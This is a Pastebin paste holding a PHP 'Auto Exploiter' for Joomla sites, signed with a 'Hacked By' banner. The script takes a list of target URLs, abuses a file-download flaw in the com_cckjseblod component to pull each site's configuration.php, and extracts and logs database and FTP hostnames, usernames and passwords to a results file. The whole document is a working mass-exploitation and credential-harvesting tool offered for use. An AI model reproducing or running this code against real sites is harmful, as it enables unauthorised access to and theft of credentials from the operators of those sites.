Advertisement
Alph4_ZeR00

Auto Exploiter joomla

Jun 28th, 2016
130
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.06 KB | None | 0 0
  1. <?php
  2.  
  3.  
  4.  
  5. //Kulinux.com  to see more toturials
  6.  
  7.  
  8.  @error_reporting(0);
  9.  
  10. @set_time_limit(0);
  11.  
  12.  
  13. //IN A GOD WE TRUST
  14. //ALPHA HACKERZ
  15. print "
  16.  
  17.  
  18.  
  19. HAcked By Alph4 ZeR00
  20.  
  21. " ;
  22.  
  23.  
  24.  
  25. $g=@file_get_contents($argv[1]);
  26.  
  27. $ss=explode("\r\n",$g);
  28.  
  29. $open=fopen("result.html","a");
  30.  
  31.  
  32.  
  33.  
  34.  
  35. foreach ($ss as $links){
  36.  
  37.   $lofe="$links/index.php?option=com_cckjseblod&task=download&file=configuration.php";
  38.  
  39.   $gg=@file_get_contents($lofe);
  40.  
  41.   if(preg_match("#class JConfig#",$gg)){
  42.  
  43.      echo "\n[+] $links ==> infected\n";fwrite($open,"<br>[+] $links <br>");
  44.  
  45.      preg_match("#tmp_path = '(.*?)\/tmp';#",$gg,$r);echo "    [-] path of site : $r[1]/\n";fwrite($open,"path of site : $r[1] <br>");
  46.  
  47.  
  48.  
  49.      echo "\t[*]>--database informations --< \n";  ///// database info
  50.  
  51.      preg_match("#host = '(.*?)';#",$gg,$r);echo "\t\t[!] Host : $r[1]\n";fwrite($open,"host : $r[1] <br>");
  52.  
  53.      preg_match_all("#user = '(.*?)';#",$gg,$rr);echo "\t\t[!] user : ".$rr[1][1]."\n";$aaa=$rr[1][1];fwrite($open,"user :$aaa <br>");
  54.  
  55.      preg_match("#password = '(.*?)';#",$gg,$r);echo "\t\t[!] password : $r[1]\n";fwrite($open,"pass : $r[1] <br>");
  56.  
  57.      preg_match("#db = '(.*?)';#",$gg,$r);echo "\t\t[!] Database : $r[1]\n";fwrite($open,"db: $r[1] <br>");
  58.  
  59.  
  60.  
  61.      echo "\t[*]>--Ftp informations --< \n";    /////// ftp info
  62.  
  63.      preg_match("#ftp_enable = '(.*?)';#",$gg,$r);echo "\t\t[!] ftp enable : $r[1]\n";
  64.  
  65.      preg_match("#ftp_host = '(.*?)';#",$gg,$r);echo "\t\t[!] ftp_host : $r[1]\n";fwrite($open,"ftp-host : $r[1] <br>");
  66.  
  67.      preg_match("#ftp_port = '(.*?)';#",$gg,$r);echo "\t\t[!] ftp port : $r[1]\n";fwrite($open,"ftp-port : $r[1] <br>");
  68.  
  69.      preg_match("#ftp_user = '(.*?)';#",$gg,$r);echo "\t\t[!] ftp user : $r[1]\n";fwrite($open,"ftp-user : $r[1] <br>");
  70.  
  71.      preg_match("#ftp_pass = '(.*?)';#",$gg,$r);echo "\t\t[!] ftp pass : $r[1]\n";fwrite($open,"ftp-pass : $r[1] <br>");
  72.  
  73.      preg_match("#ftp_root = '(.*?)';#",$gg,$r);echo "\t\t[!] ftp root : $r[1]\n";
  74.  
  75.   }else{
  76.  
  77.     echo "\n[+] $links ==> Not infected\n";
  78.  
  79.   }
  80.  
  81. }
  82.  
  83. fclose($open);
  84.  
  85. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement